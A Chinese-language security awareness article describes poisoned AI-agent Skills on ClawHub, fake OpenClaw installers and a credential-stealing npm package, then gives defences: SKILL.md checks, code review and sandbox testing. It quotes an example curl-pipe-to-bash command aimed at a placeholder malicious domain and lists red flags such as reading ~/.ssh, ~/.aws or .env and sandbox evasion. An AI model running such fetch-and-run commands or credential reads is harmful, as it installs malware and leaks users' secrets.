“装完这个Skill，我的API Key就没了。”

有人在论坛上发了这句话，底下跟了200多条回复。不是安慰，是“我也被坑过”。

这不是段子。2026年初，ClawHub上爆发了大规模技能投毒行动，攻击者批量上传伪装成加密货币工具、办公助手的恶意Skills，诱骗用户下载安装。安天将此次攻击命名为“利爪浩劫”。不到一个月，火绒又监测到虚假OpenClaw安装包在GitHub传播，本质是下载器，会云控下载窃密木马和反向代理。紧接着，npm上出现恶意包@openclaw-ai/openclawai，伪装成CLI工具，窃取SSH密钥、云凭证、AI配置，甚至浏览器会话。

攻击者的套路并不复杂，但每次都能得手。

第一招：SKILL.md——藏在文档里的钓鱼钩

SKILL.md是每个Skill的说明书，看起来人畜无害。但攻击者最擅长在这里动手脚。

他们怎么干？

在SKILL.md的“安装先决条件”“功能依赖配置”等章节，夹带恶意下载链接或命令。例如伪装成加密货币监控工具的Skill，文档里写着“请运行以下命令安装依赖”：

curl -sL https://恶意域名/setup.sh | bash

用户以为在装依赖，实际在下载木马。

怎么识破？

安天AVL SDK引擎专门强化了对SKILL.md的解析能力，能提取其中的URL并与威胁情报库比对。手工审查时，重点检查两点：

• 是否包含curl|wget + 未知域名的组合
• 是否要求下载加密压缩包并提供解压密码

发现任何一条，直接弃用。

第二招：代码审查——肉眼扫雷

如果SKILL.md没问题，真正的炸弹可能埋在代码文件里。

危险信号清单：

• 向外部服务器发送数据
• 无理由读取~/.ssh、~/.aws、.env
• 对任何内容使用base64解码
• 使用eval()或exec()
• 混淆代码（压缩、编码、控制流平坦化）
• 请求sudo/管理员权限

比如某“天气助手”Skill，正常功能是从天气API获取数据并发送到用户邮箱。但代码里还偷偷读取~/.clawdbot/.env——里面存的正是AI的API Key。

火绒的分析报告里有一个更隐蔽的案例：恶意下载器会检查鼠标是否移动、用户名是否为sandbox、是否运行在虚拟机中。检测到沙箱环境直接退出，让你根本看不到它在干什么。

审查时建议用skill-vetter这类自动化工具先扫一遍，再结合人工判断。北航团队开源的ClawGuard Auditor更进一步——采用“动静结合”架构，在技能运行前做静态分析，运行中实时监控，一旦检测到敏感操作立即接管。

第三招：沙箱测试——让恶意代码自己暴露

前两招都过了，还是不放心？丢进沙箱跑一遍。

沙箱是隔离环境，Skill在里面跑，就算有问题也伤不到真系统。绿盟的NSF-ClawGuard就支持与沙箱联动：可疑Skill先在沙箱里执行，系统实时监控其行为，再根据结果决定是否放行。

沙箱主要看什么？

阿里云的OpenClaw安全教程里列出几个关键监控点：

• 是否向未知IP发送数据
• 是否试图访问敏感目录
• 是否执行非预期命令

发现任何异常，直接封禁。

怎么防？

ClawHub官方已下架大批恶意Skills，但仍有漏网。截至2月6日，平台共3498个Skills，历史恶意Skills至少1184个。

几条实用建议：

1. 安装任何Skill前，先跑skill-vetter扫一遍
2. 拒绝来源不明的压缩包和加密脚本
3. 敏感数据加密存储，定期轮换
4. 限制OpenClaw权限，别用管理员跑
5. 优先用阿里云等平台的一键部署方案，规避供应链风险

完整的恶意Skills检测规则和审计工具清单，在 钓鱼Skill 专题里有人整理好了。下个Skill安装前，花3分钟扫一遍，省得事后发帖“我也被坑了”。